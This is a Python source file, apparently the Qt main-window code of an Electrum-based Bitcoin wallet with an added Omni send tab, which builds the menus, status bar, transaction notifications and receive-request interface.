base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.send_omni_tab = self.create_send_omni_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
tabs.addTab(self.send_omni_tab, read_QIcon("tab_send.png"), _('SendOmni'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = QMessageBox.question(self,
"Electrum - " + _("Enable update check"),
_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"),
QMessageBox.Yes,
QMessageBox.No)
config.set_key('check_updates', choice == QMessageBox.Yes, save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
traceback.print_exception(*exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
self.history_model.on_fee_histogram()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.print_error("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
